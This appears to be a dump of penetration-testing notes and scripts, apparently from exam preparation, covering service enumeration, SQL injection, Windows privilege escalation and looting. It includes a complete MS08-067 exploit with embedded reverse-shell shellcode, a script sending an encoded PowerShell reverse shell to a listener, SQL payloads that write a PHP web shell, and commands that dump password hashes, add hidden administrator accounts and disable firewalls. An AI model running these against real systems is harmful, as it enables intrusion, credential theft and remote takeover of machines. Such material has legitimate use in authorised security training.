16 | 17 | ``` 18 | Always start with a stealthy scan to avoid closing ports. 19 | 20 | # Syn-scan 21 | nmap -sS INSERTIPADDRESS 22 | 23 | # Service-version, default scripts, OS: 24 | nmap INSERTIPADDRESS -sV -sC -O 25 | 26 | # Scan all ports, might take a while. 27 | nmap INSERTIPADDRESS -p- 28 | 29 | # Scan for UDP 30 | nmap INSERTIPADDRESS -sU 31 | unicornscan -mU -v -I INSERTIPADDRESS 32 | 33 | # Connect to udp if one is open 34 | nc -u INSERTIPADDRESS 48772 35 | 36 | # Monster scan 37 | nmap INSERTIPADDRESS -p- -A -T4 -sC 38 | ``` 39 | 40 | 41 | ### Port 21 - FTP 42 | 43 | - Name: 44 | - Version: 45 | - Anonymous login: 46 | 47 | INSERTFTPTEST 48 | 49 | ``` 50 | nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS 51 | ``` 52 | 53 | ### Port 22 - SSH 54 | 55 | - Name: 56 | - Version: 57 | - Protocol: 58 | - RSA-key-fingerprint: 59 | - Takes-password: 60 | If you have usernames test login with username:username 61 | 62 | INSERTSSHCONNECT 63 | 64 | 65 | ### Port 25 66 | 67 | - Name: 68 | - Version: 69 | - VRFY: 70 | - EXPN: 71 | 72 | INSERTSMTPCONNECT 73 | 74 | ``` 75 | nc -nvv INSERTIPADDRESS 25 76 | HELO foo 77 | 78 | nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS 79 | ``` 80 | 81 | ### Port 110 - Pop3 82 | 83 | - Name: 84 | - Version: 85 | 86 | INSERTPOP3CONNECT 87 | 88 | ### Port 135 - MSRPC 89 | 90 | Some versions are vulnerable. 91 | 92 | ``` 93 | nmap INSERTIPADDRESS --script=msrpc-enum 94 | ``` 95 | 96 | Exploit: 97 | 98 | ``` 99 | msf > use exploit/windows/dcerpc/ms03_026_dcom 100 | ``` 101 | 102 | ### Port 139/445 - SMB 103 | 104 | - Name: 105 | - Version: 106 | - Domain/workgroup name: 107 | - Domain-sid: 108 | - Allows unauthenticated login: 109 | 110 | 111 | ``` 112 | nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445 113 | 114 | enum4linux -a INSERTIPADDRESS 115 | 116 | rpcclient -U "" INSERTIPADDRESS 117 | srvinfo 118 | enumdomusers 119 | getdompwinfo 120 | querydominfo 121 | netshareenum 122 | netshareenumall 123 | 124 | smbclient -L INSERTIPADDRESS 125 | smbclient //INSERTIPADDRESS/tmp 126 | smbclient \\\\INSERTIPADDRESS\\ipc$ -U john 127 | smbclient //INSERTIPADDRESS/ipc$ -U john 128 | smbclient //INSERTIPADDRESS/admin$ -U john 129 | 130 | Log in with shell: 131 | winexe -U username //INSERTIPADDRESS "cmd.exe" --system 132 | 133 | ``` 134 | 135 | ### Port 161/162 UDP - SNMP 136 | 137 | 138 | ``` 139 | nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS 140 | snmp-check -t INSERTIPADDRESS -c public 141 | ``` 142 | 143 | ``` 144 | # Common community strings 145 | public 146 | private 147 | community 148 | ``` 149 | 150 | 151 | 152 | ### Port 554 - RTSP 153 | 154 | 155 | ### Port 1030/1032/1033/1038 156 | 157 | Used by RPC to connect in domain network. Usually nothing. 158 | 159 | ### Port 1433 - MSSQL 160 | 161 | - Version: 162 | 163 | ``` 164 | use auxiliary/scanner/mssql/mssql_ping 165 | 166 | # Last options. Brute force. 167 | scanner/mssql/mssql_login 168 | 169 | # Log in to mssql 170 | sqsh -S INSERTIPADDRESS -U sa 171 | 172 | # Execute commands 173 | xp_cmdshell 'date' 174 | go 175 | ``` 176 | 177 | If you have credentials look in metasploit for other modules. 178 | 179 | ## Port 1521 - Oracle 180 | 181 | Name: 182 | Version: 183 | Password protected: 184 | 185 | ``` 186 | tnscmd10g version -h INSERTIPADDRESS 187 | tnscmd10g status -h INSERTIPADDRESS 188 | ``` 189 | 190 | 191 | ### Port 2100 - Oracle XML DB 192 | 193 | Can be accessed through ftp. 194 | Some default passwords here: https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm 195 | - Name: 196 | - Version: 197 | 198 | Default logins: 199 | 200 | ``` 201 | sys:sys 202 | scott:tiger 203 | ``` 204 | 205 | ### Port 2049 - NFS 206 | 207 | ``` 208 | showmount -e INSERTIPADDRESS 209 | 210 | If you find anything you can mount it like this: 211 | 212 | mount INSERTIPADDRESS:/ /tmp/NFS 213 | mount -t INSERTIPADDRESS:/ /tmp/NFS 214 | ``` 215 | 216 | ### 3306 - MySQL 217 | 218 | - Name: 219 | - Version: 220 | 221 | ``` 222 | mysql --host=INSERTIPADDRESS -u root -p 223 | 224 | nmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 INSERTIPADDRESS -p 3306 225 | ``` 226 | 227 | ### Port 3339 - Oracle web interface 228 | 229 | - Basic info about web service (apache, nginx, IIS) 230 | - Server: 231 | - Scripting language: 232 | - Apache Modules: 233 | - IP-address: 234 | - Domain-name address: 235 | 236 | ### Port 3389 - Remote desktop 237 | 238 | Test logging in to see what OS is running 239 | 240 | ``` 241 | rdesktop -u guest -p guest INSERTIPADDRESS -g 94% 242 | 243 | # Brute force 244 | ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS 245 | ``` 246 | 247 | 248 | ### Port 80 249 | 250 | - Server: 251 | - Scripting language: 252 | - Apache Modules: 253 | - Domain-name address: 254 | 255 | INSERTCURLHEADER 256 | 257 | 258 | - Web application 259 | - Name: 260 | - Version: 261 | 262 | ``` 263 | # Nikto 264 | nikto -h http://INSERTIPADDRESS 265 | 266 | # Nikto with squid proxy 267 | nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444 268 | 269 | # Get header 270 | curl -i INSERTIPADDRESS 271 | 272 | # Get everything 273 | curl -i -L INSERTIPADDRESS 274 | 275 | # Check if it is possible to upload using put 276 | curl -v -X OPTIONS http://INSERTIPADDRESS/ 277 | curl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php 278 | 279 | # Check for title and all links 280 | dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix 281 | ``` 282 | 283 | 284 | #### Nikto scan 285 | 286 | 287 | INSERTNIKTOSCAN 288 | 289 | 290 | 291 | #### Url brute force 292 | 293 | 294 | 295 | ``` 296 | # Dirb 297 | dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt 298 | 299 | # Gobuster - remove relevant responde codes (403 for example) 300 | gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e 301 | ``` 302 | 303 | INSERTDIRBSCAN 304 | 305 | 306 | #### Default/Weak login 307 | 308 | Google documentation for default passwords and test them: 309 | 310 | ``` 311 | site:webapplication.com password 312 | ``` 313 | 314 | ``` 315 | admin admin 316 | admin password 317 | admin 318 | admin nameofservice 319 | root root 320 | root admin 321 | root password 322 | root nameofservice 323 | password 324 | admin 325 | username 326 | nameofservice 327 | ``` 328 | 329 | #### LFI/RFI 330 | 331 | ``` 332 | # Kadimus 333 | /root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page= 334 | 335 | 336 | # Bypass execution 337 | http://INSERTIPADDRESS/index.php?page=php://filter/convert.base64-encode/resource=index 338 | base64 -d savefile.php 339 | 340 | # Bypass extension 341 | http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt%00 342 | http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt? 343 | ``` 344 | 345 | 346 | #### SQL-Injection 347 | 348 | ``` 349 | # Post 350 | ./sqlmap.py -r search-test.txt -p tfUPass 351 | 352 | # Get 353 | sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql 354 | 355 | # Crawl 356 | sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3 357 | ``` 358 | 359 | #### Sql-login-bypass 360 | 361 | 362 | - Open Burp-suite 363 | - Make and intercept request 364 | - Send to intruder 365 | - Cluster attack 366 | - Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html) 367 | - Attack 368 | - Check for response length variation 369 | 370 | ### Password brute force - last resort 371 | 372 | ``` 373 | cewl 374 | ``` 375 | 376 | ### Port 443 - HTTPS 377 | 378 | Heartbleed: 379 | 380 | ``` 381 | sslscan INSERTIPADDRESS:443 382 | ``` 383 | 384 | ## Vulnerability analysis 385 | 386 | Now we have gathered information about the system. Now comes the part where we look for exploits and vulnerabilities and features. 387 | 388 | ### To try - List of possibilities 389 | Add possible exploits here: 390 | 391 | 392 | ### Find sploits - Searchsploit and google 393 | 394 | Where there are many exploits for a software, use google. It will automatically sort it by popularity. 395 | 396 | ``` 397 | site:exploit-db.com apache 2.4.7 398 | 399 | # Remove dos-exploits 400 | 401 | searchsploit Apache 2.4.7 | grep -v '/dos/' 402 | searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat" 403 | 404 | # Only search the title (exclude the path), add the -t 405 | searchsploit -t Apache | grep -v '/dos/' 406 | ``` 407 | 408 | 409 | 410 | ---------------------------------------------------------------------------- 411 | 412 | 413 | 414 | '''''''''''''''''''''''''''''''''' PRIVESC ''''''''''''''''''''''''''''''''' 415 | 416 | 417 | 418 | ----------------------------------------------------------------------------- 419 | 420 | 421 | ## Privilege escalation 422 | 423 | Now we start the whole enumeration-process over gain. This is a checklist. You need to check of every single one, in this order. 424 | 425 | - Kernel exploits 426 | - Cleartext password 427 | - Reconfigure service parameters 428 | - Inside service 429 | - Program running as root 430 | - Installed software 431 | - Scheduled tasks 432 | - Weak passwords 433 | 434 | 435 | 436 | ### To-try list 437 | Here you will add all possible leads. What to try. 438 | 439 | 440 | ### Basic info 441 | 442 | - OS: 443 | - Version: 444 | - Architecture: 445 | - Current user: 446 | - Hotfixes: 447 | - Antivirus: 448 | 449 | **Users:** 450 | 451 | **Localgroups:** 452 | 453 | ``` 454 | systeminfo 455 | set 456 | hostname 457 | net users 458 | net user user1 459 | net localgroups 460 | accesschk.exe -uwcqv "Authenticated Users" * 461 | 462 | netsh firewall show state 463 | netsh firewall show config 464 | 465 | # Set path 466 | set PATH=%PATH%;C:\xampp\php 467 | ``` 468 | 469 | 470 | ### Kernel exploits 471 | 472 | 473 | ``` 474 | # Look for hotfixes 475 | systeminfo 476 | 477 | wmic qfe get Caption,Description,HotFixID,InstalledOn 478 | 479 | # Search for exploits 480 | site:exploit-db.com windows XX XX 481 | ``` 482 | 483 | 484 | ### Cleartext passwords 485 | 486 | ``` 487 | # Windows autologin 488 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 489 | 490 | # VNC 491 | reg query "HKCU\Software\ORL\WinVNC3\Password" 492 | 493 | # SNMP Parameters 494 | reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" 495 | 496 | # Putty 497 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" 498 | 499 | # Search for password in registry 500 | reg query HKLM /f password /t REG_SZ /s 501 | reg query HKCU /f password /t REG_SZ /s 502 | ``` 503 | 504 | 505 | ### Reconfigure service parameters 506 | 507 | - Unquoted service paths 508 | 509 | Check book for instructions 510 | 511 | - Weak service permissions 512 | 513 | Check book for instructions 514 | 515 | ### Inside service 516 | 517 | Check netstat to see what ports are open from outside and from inside. Look for ports only available on the inside. 518 | 519 | ``` 520 | # Meterpreter 521 | run get_local_subnets 522 | 523 | netstat /a 524 | netstat -ano 525 | ``` 526 | 527 | ### Programs running as root/system 528 | 529 | 530 | 531 | ### Installed software 532 | 533 | ``` 534 | # Metasploit 535 | ps 536 | 537 | tasklist /SVC 538 | net start 539 | reg query HKEY_LOCAL_MACHINE\SOFTWARE 540 | DRIVERQUERY 541 | 542 | Look in: 543 | C:\Program files 544 | C:\Program files (x86) 545 | Home directory of the user 546 | ``` 547 | 548 | 549 | ### Scheduled tasks 550 | 551 | ``` 552 | schtasks /query /fo LIST /v 553 | 554 | Check this file: 555 | c:\WINDOWS\SchedLgU.Txt 556 | ``` 557 | 558 | ### Weak passwords 559 | 560 | Remote desktop 561 | 562 | ``` 563 | ncrack -vv --user george -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS 564 | ``` 565 | 566 | ### Useful commands 567 | 568 | 569 | **Add user and enable RDP** 570 | 571 | ``` 572 | net user haxxor Haxxor123 /add 573 | net localgroup Administrators haxxor /add 574 | net localgroup "Remote Desktop Users" haxxor /ADD 575 | 576 | # Enable RDP 577 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 578 | 579 | Turn firewall off 580 | netsh firewall set opmode disable 581 | 582 | Or like this 583 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 584 | 585 | If you get this error: 586 | 587 | "ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ? 588 | Failed to connect, CredSSP required by server."" 589 | 590 | Add this reg key: 591 | 592 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f 593 | ``` 594 | 595 | 596 | 597 | ------------------------------------------------------------------------ 598 | 599 | 600 | 601 | 602 | ----------------------------- LOOT LOOT LOOT LOOT ------------------- 603 | 604 | 605 | 606 | 607 | ------------------------------------------------------------------------ 608 | 609 | 610 | ## Loot 611 | 612 | - Proof: 613 | - Network secret: 614 | - Password and hashes: 615 | - Dualhomed: 616 | - Tcpdump: 617 | - Interesting files: 618 | - Databases: 619 | - SSH-keys: 620 | - Browser: 621 | 622 | ### Proof 623 | 624 | ### Network secret 625 | 626 | ### Passwords and hashes 627 | 628 | ``` 629 | wce32.exe -w 630 | wce64.exe -w 631 | fgdump.exe 632 | 633 | reg.exe save hklm\sam c:\sam_backup 634 | reg.exe save hklm\security c:\security_backup 635 | reg.exe save hklm\system c:\system 636 | 637 | # Meterpreter 638 | hashdump 639 | load mimikatz 640 | msv 641 | ``` 642 | 643 | ### Dualhomed 644 | 645 | ``` 646 | ipconfig /all 647 | route print 648 | 649 | # What other machines have been connected 650 | arp -a 651 | ``` 652 | 653 | ### Tcpdump 654 | 655 | ``` 656 | # Meterpreter 657 | run packetrecorder -li 658 | run packetrecorder -i 1 659 | ``` 660 | 661 | ### Interesting files 662 | 663 | ``` 664 | #Meterpreter 665 | search -f *.txt 666 | search -f *.zip 667 | search -f *.doc 668 | search -f *.xls 669 | search -f config* 670 | search -f *.rar 671 | search -f *.docx 672 | search -f *.sql 673 | 674 | # How to cat files in meterpreter 675 | cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt 676 | 677 | # Recursive search 678 | dir /s 679 | ``` 680 | 681 | ### Mail 682 | 683 | ### Browser 684 | 685 | - Browser start-page: 686 | - Browser-history: 687 | - Saved passwords: 688 | 689 | ### Databases 690 | 691 | ### SSH-keys 692 | 693 | ## How to replicate: 694 | -------------------------------------------------------------------------------- /SQL: -------------------------------------------------------------------------------- 1 | 2 | SQSH 3 | 4 | #Login 5 | sqsh -S : -U sa -P password 6 | 7 | # commands 8 | exec xp_cmdshell 'whoami' 9 | go 10 | exec xp_cmdshell 'net user kalisa pass /add' 11 | go 12 | exec xp_cmdshell 'net localgroup Administrators kalisa /add' 13 | go 14 | exec xp_cmdshell 'net localgroup "Remote Desktop Users" kalisa /add' 15 | go 16 | 17 | ------------------------------ 18 | 19 | SQLMAP 20 | # Crawl the links 21 | sqlmap -u http:// --crawl=1 22 | sqlmap -u http:// --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3 23 | 24 | # Search for databases 25 | sqlmap –u http:///index.php?par= –dbs 26 | 27 | # dump tables from database 28 | sqlmap –u http:///index.php?par= –dbs –D dbname –tables –-dump 29 | sqlmap –u http:///index.php?par= –dbs –D dbname –T tablename –-dump 30 | 31 | # OS Shell 32 | sqlmap -u http:///comment.php?id=738 --dbms=mysql --osshell 33 | 34 | -------------------------------- 35 | 36 | Manual sql injection commands 37 | 38 | # check for sqli vulnerability 39 | ?id=1' 40 | 41 | # find the number of columns 42 | ?id=1 order by 9 -- - 43 | 44 | # Find space to output db 45 | ?id=1 union select 1,2,3,4,5,6,7,8,9 -- - 46 | 47 | # Get username of the sql-user 48 | ?id=1 union select 1,2,3,4,user(),6,7,8,9 -- - 49 | 50 | # Get version 51 | ?id=1 union select 1,2,3,4,version(),6,7,8,9 -- - 52 | 53 | # Get all tables 54 | ?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- - 55 | 56 | # Get all columns from a specific table 57 | ?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- - 58 | 59 | # Get content from the users-table. From columns name and password. (The 0x3a only servers to create a delimiter between name and password) 60 | ?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users 61 | 62 | # read file 63 | ?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- - 64 | ?id=1 union select 1,2,3,4, load_file('/var/www/login.php') ,6,7,8,9 -- - 65 | 66 | # create a file and call it to check if really created 67 | ?id=1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- - 68 | ?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- - 69 | 70 | # create a file to get a shell 71 | ?id=1 union select null,null,null,null,'' ,6,7,8,9 into outfile '/var/www/shell.php' -- - 72 | ?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- - 73 | 74 | # then go to browser and see if you can execute commands 75 | http:///shell.php?cmd=id 76 | 77 | # Then use Pentest Monkey Reverse Shells to call your shell 78 | -------------------------------------------------------------------------------- /Scripts - MS08-067: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import struct 3 | import time 4 | import sys 5 | from threading import Thread # Thread is imported incase you would like to modify 6 | 7 | try: 8 | from impacket import smb 9 | from impacket import uuid 10 | #from impacket.dcerpc import dcerpc 11 | from impacket.dcerpc.v5 import transport 12 | 13 | except ImportError, _: 14 | print 'Install the following library to make this script work' 15 | print 'Impacket : https://github.com/CoreSecurity/impacket.git' 16 | print 'PyCrypto : https://pypi.python.org/pypi/pycrypto' 17 | sys.exit(1) 18 | 19 | print '#######################################################################' 20 | print '# MS08-067 Exploit' 21 | print '# This is a modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/).' 22 | print '# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi' 23 | print '#' 24 | print '# Mod in 2018 by Andy Acer:' 25 | print '# - Added support for selecting a target port at the command line.' 26 | print '# It seemed that only 445 was previously supported.' 27 | print '# - Changed library calls to correctly establish a NetBIOS session for SMB transport' 28 | print '# - Changed shellcode handling to allow for variable length shellcode. Just cut and paste' 29 | print '# into this source file.' 30 | print '#######################################################################\n' 31 | 32 | 33 | # ------------------------------------------------------------------------ 34 | # REPLACE THIS SHELLCODE with shellcode generated for your use 35 | # Note that length checking logic follows this section, so there's no need to count bytes or bother with NOPS. 36 | # 37 | # Example msfvenom commands to generate shellcode: 38 | # msfvenom -p windows/shell_bind_tcp RHOST=10.11.1.229 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows 39 | # msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.157 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows 40 | # msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.157 LPORT=62000 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows 41 | 42 | # Reverse TCP to 10.11.0.36 port 4444: 43 | shellcode=( 44 | "\x29\xc9\x83\xe9\xa5\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e" 45 | "\xfd\x91\x94\x90\x83\xee\xfc\xe2\xf4\x01\x79\x16\x90\xfd\x91" 46 | "\xf4\x19\x18\xa0\x54\xf4\x76\xc1\xa4\x1b\xaf\x9d\x1f\xc2\xe9" 47 | "\x1a\xe6\xb8\xf2\x26\xde\xb6\xcc\x6e\x38\xac\x9c\xed\x96\xbc" 48 | "\xdd\x50\x5b\x9d\xfc\x56\x76\x62\xaf\xc6\x1f\xc2\xed\x1a\xde" 49 | "\xac\x76\xdd\x85\xe8\x1e\xd9\x95\x41\xac\x1a\xcd\xb0\xfc\x42" 50 | "\x1f\xd9\xe5\x72\xae\xd9\x76\xa5\x1f\x91\x2b\xa0\x6b\x3c\x3c" 51 | "\x5e\x99\x91\x3a\xa9\x74\xe5\x0b\x92\xe9\x68\xc6\xec\xb0\xe5" 52 | "\x19\xc9\x1f\xc8\xd9\x90\x47\xf6\x76\x9d\xdf\x1b\xa5\x8d\x95" 53 | "\x43\x76\x95\x1f\x91\x2d\x18\xd0\xb4\xd9\xca\xcf\xf1\xa4\xcb" 54 | "\xc5\x6f\x1d\xce\xcb\xca\x76\x83\x7f\x1d\xa0\xf9\xa7\xa2\xfd" 55 | "\x91\xfc\xe7\x8e\xa3\xcb\xc4\x95\xdd\xe3\xb6\xfa\x18\x7c\x6f" 56 | "\x2d\x29\x04\x91\xfd\x91\xbd\x54\xa9\xc1\xfc\xb9\x7d\xfa\x94" 57 | "\x6f\x28\xfb\x9e\xf8\xf7\x9a\x94\xb4\x95\x93\x94\xb2\x45\x18" 58 | "\x72\xc0\xad\xc1\xc4\xd0\xad\xd1\xc4\xf8\x17\x9e\x4b\x70\x02" 59 | "\x44\x03\xfa\xed\xc7\xc3\xf8\x64\x34\xe0\xf1\x02\x44\x11\x50" 60 | "\x89\x9b\x6b\xde\xf5\xe4\x78\x78\x9a\x91\x94\x90\x97\x91\xfe" 61 | "\x94\xab\xc6\xfc\x92\x24\x59\xcb\x6f\x28\x12\x6c\x90\x83\xa7" 62 | "\x1f\xa6\x97\xd1\xfc\x90\xed\x91\x94\xc6\x97\x91\xfc\xc8\x59" 63 | "\xc2\x71\x6f\x28\x02\xc7\xfa\xfd\xc7\xc7\xc7\x95\x93\x4d\x58" 64 | "\xa2\x6e\x41\x13\x05\x91\xe9\xb8\xa5\xf9\x94\xd0\xfd\x91\xfe" 65 | "\x90\xad\xf9\x9f\xbf\xf2\xa1\x6b\x45\xaa\xf9\xe1\xfe\xb0\xf0" 66 | "\x6b\x45\xa3\xcf\x6b\x9c\xd9\x9e\x11\xe0\x02\x6e\x6b\x79\x66" 67 | "\x6e\x6b\x6f\xfc\x52\xbd\x56\x88\x50\x57\x2b\x1d\x8c\xbe\x9a" 68 | "\x95\x37\x01\x2d\x60\x6e\x41\xac\xfb\xed\x9e\x10\x06\x71\xe1" 69 | "\x95\x46\xd6\x87\xe2\x92\xfb\x94\xc3\x02\x44\x94\x90" 70 | ) 71 | # ------------------------------------------------------------------------ 72 | 73 | # Gotta make No-Ops (NOPS) + shellcode = 410 bytes 74 | num_nops = 410 - len(shellcode) 75 | newshellcode = "\x90" * num_nops 76 | newshellcode += shellcode # Add NOPS to the front 77 | shellcode = newshellcode # Switcheroo with the newshellcode temp variable 78 | 79 | #print "Shellcode length: %s\n\n" % len(shellcode) 80 | 81 | nonxjmper = "\x08\x04\x02\x00%s" + "A" * 4 + "%s" + \ 82 | "A" * 42 + "\x90" * 8 + "\xeb\x62" + "A" * 10 83 | disableNXjumper = "\x08\x04\x02\x00%s%s%s" + "A" * \ 84 | 28 + "%s" + "\xeb\x02" + "\x90" * 2 + "\xeb\x62" 85 | ropjumper = "\x00\x08\x01\x00" + "%s" + "\x10\x01\x04\x01"; 86 | module_base = 0x6f880000 87 | 88 | 89 | def generate_rop(rvas): 90 | gadget1 = "\x90\x5a\x59\xc3" 91 | gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"] 92 | gadget3 = "\xcc\x90\xeb\x5a" 93 | ret = struct.pack(' 00 00 01 36 => 310. No idea why it's "doubled" 197 | # from 310 to 620. 620 = 410 shellcode + extra stuff in the path. 198 | MaxCount = "\x36\x01\x00\x00" # Decimal 310. => Path length of 620. 199 | Offset = "\x00\x00\x00\x00" 200 | ActualCount = "\x36\x01\x00\x00" # Decimal 310. => Path length of 620 201 | 202 | self.__stub = server + MaxCount + Offset + ActualCount + \ 203 | path + "\xE8\x03\x00\x00" + prefix + "\x01\x10\x00\x00\x00\x00\x00\x00" 204 | 205 | return 206 | 207 | def run(self): 208 | self.__DCEPacket() 209 | self.__dce.call(0x1f, self.__stub) 210 | time.sleep(3) 211 | print 'Exploit finish\n' 212 | 213 | if __name__ == '__main__': 214 | try: 215 | target = sys.argv[1] 216 | os = sys.argv[2] 217 | port = sys.argv[3] 218 | except IndexError: 219 | print '\nUsage: %s \n' % sys.argv[0] 220 | print 'Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445' 221 | print 'Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)' 222 | print 'Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal' 223 | print 'Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English' 224 | print 'Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)' 225 | print 'Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)' 226 | print 'Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)' 227 | print '' 228 | print 'Also: nmap has a good OS discovery script that pairs well with this exploit:' 229 | print 'nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1' 230 | print '' 231 | sys.exit(-1) 232 | 233 | 234 | current = SRVSVC_Exploit(target, os, port) 235 | current.start() 236 | 237 | 238 | 239 | -------------------------------------------------------------------------------- /Scripts - SMB: -------------------------------------------------------------------------------- 1 | # SMB version check 2 | 3 | 4 | #!/bin/sh 5 | #Description: 6 | # Requires root or enough permissions to use tcpdump 7 | # Will listen for the first 7 packets of a null login 8 | # and grab the SMB Version 9 | #Notes: 10 | # Will sometimes not capture or will print multiple 11 | # lines. May need to run a second time for success. 12 | if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi 13 | if [ ! -z $2 ]; then rport=$2; else rport=139; fi 14 | tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " & 15 | echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null 16 | sleep 0.5 && echo "" 17 | 18 | 19 | 20 | # SMB nmap Scripting Engine Vulnerability scan 21 | nmap -p 139,445 10.11.1.115 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 22 | -------------------------------------------------------------------------------- /Scripts - Windows File Upload Using PS (without nc.exe): -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # Thanks to Alamot! 3 | import sys 4 | import urllib, urllib2 5 | from base64 import b64encode 6 | 7 | if (len(sys.argv) < 5): 8 | print("usage: ") 9 | exit() 10 | 11 | RHOST = sys.argv[1] 12 | RPORT = sys.argv[2] 13 | LHOST = sys.argv[3] 14 | LPORT = sys.argv[4] 15 | 16 | print("RHOST="+RHOST+" RPORT="+RPORT+" LHOST="+LHOST+" LPORT="+LPORT+'\n') 17 | 18 | payload = "$client = New-Object System.Net.Sockets.TCPClient('"+LHOST+"',"+LPORT+"); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close();" 19 | 20 | print(payload+'\n') 21 | 22 | b64enc_command = b64encode(payload.encode('UTF-16LE')).replace('+','%2b') 23 | 24 | url = "http://"+RHOST+":"+RPORT+"/?search=%00{.exec%7CC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe%20-EncodedCommand%20"+b64enc_command+".}" 25 | 26 | print(url) 27 | response = urllib2.urlopen(url) 28 | print("\nSTATUS: "+str(response.getcode())) 29 | -------------------------------------------------------------------------------- /Shells: -------------------------------------------------------------------------------- 1 | 2 | 